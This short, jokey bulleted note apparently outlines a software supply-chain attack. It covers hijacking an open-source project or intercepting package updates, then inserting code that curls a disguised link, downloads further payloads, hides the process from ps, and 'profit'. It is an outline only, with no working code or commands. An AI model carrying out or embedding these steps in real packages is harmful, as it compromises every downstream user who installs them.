Concept
- Hijack open-source-project via orphan request, author request, pull request (i.e. CoPay compromise, ...), etc. OR Insert man-in-the-middle into package update (sometimes easier?)
- Insert lé epic malicious code:
- Curl call to legit-looking website (maybe a proxy or a bitly-link)
- Download even more malicious stuff from remote address
- Hide malicious process from ps
- profit 👍 👍